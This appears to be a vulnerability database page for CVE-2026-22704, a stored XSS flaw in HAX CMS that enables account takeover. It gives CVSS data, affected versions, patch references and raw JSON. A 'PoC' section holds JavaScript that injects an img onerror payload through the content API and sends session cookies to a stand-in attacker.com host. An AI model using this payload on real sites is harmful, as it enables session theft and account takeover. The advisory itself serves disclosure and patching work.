Security Vulnerability Report
CVE-2026-22704 CVSS 8.0 HIGH

CVE-2026-22704

Published: 2026-01-10 07:16:03
Last Modified: 2026-02-05 20:59:55

Description

HAX CMS helps manage microsite universe with PHP or NodeJs backends. In versions 11.0.6 to before 25.0.0, HAX CMS is vulnerable to stored XSS, which could lead to account takeover. This issue has been patched in version 25.0.0.

CVSS Details

CVSS Score
8.0
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:psu:haxcms-nodejs:11.0.6:*:*:*:*:node.js:*:* - VULNERABLE
HAX CMS 11.0.6 to < 25.0.0
HAX CMS Node.js backend versions 11.0.6 to < 25.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2026-22704 Stored XSS PoC for HAX CMS
// Attack requires low-privilege account, triggers when admin views the page
// Malicious payload injection via content creation/edit API
const maliciousPayload = `
<img src=x onerror="
  // Steal session cookie
  fetch('https://attacker.com/steal?cookie=' + document.cookie);
  // Hijack session
  fetch('https://attacker.com/api/session-hijack', {
    method: 'POST',
    body: JSON.stringify({ session: document.cookie, userAgent: navigator.userAgent })
  });
">
`;

// Example: POST request to create content with XSS payload
fetch('/api/content/create', {
  method: 'POST',
  headers: {
    'Content-Type': 'application/json',
    'Authorization': 'Bearer [low-privilege-token]'
  },
  body: JSON.stringify({ title: 'Malicious Content', body: maliciousPayload, format: 'html' })
});

// When admin views: <img src=x onerror="[malicious JS]"> executes
// Results in: account takeover, session hijacking, data theft

References

https://github.com/haxtheweb/haxcms-nodejs/commit/317a8ae29f88be389f7cfeffaef416957122d97e (Patch)
https://github.com/haxtheweb/haxcms-nodejs/releases/tag/v25.0.0 (Release Notes)
https://github.com/haxtheweb/issues/security/advisories/GHSA-3fm2-xfq7-7778 (Exploit, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22704", "sourceIdentifier": "[email protected]", "published": "2026-01-10T07:16:03.200", "lastModified": "2026-02-05T20:59:55.283", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HAX CMS helps manage microsite universe with PHP or NodeJs backends. In versions 11.0.6 to before 25.0.0, HAX CMS is vulnerable to stored XSS, which could lead to account takeover. This issue has been patched in version 25.0.0."}, {"lang": "es", "value": "HAX CMS ayuda a gestionar el universo de micrositios con backends de PHP o NodeJs. En las versiones 11.0.6 hasta antes de la 25.0.0, HAX CMS es vulnerable a XSS almacenado, lo que podría llevar a la toma de control de cuentas. Este problema ha sido parcheado en la versión 25.0.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H", "baseScore": 8.0, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.3, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": 
"cpe:2.3:a:psu:haxcms-nodejs:11.0.6:*:*:*:*:node.js:*:*", "matchCriteriaId": "EF62173E-0BA7-4937-BBCF-162BA9F775FD"}]}]}], "references": [{"url": "https://github.com/haxtheweb/haxcms-nodejs/commit/317a8ae29f88be389f7cfeffaef416957122d97e", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/haxtheweb/haxcms-nodejs/releases/tag/v25.0.0", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/haxtheweb/issues/security/advisories/GHSA-3fm2-xfq7-7778", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}